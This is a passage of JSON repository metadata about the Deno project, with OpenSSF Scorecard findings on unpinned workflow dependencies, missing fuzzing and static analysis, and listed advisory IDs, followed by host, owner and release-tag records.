if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"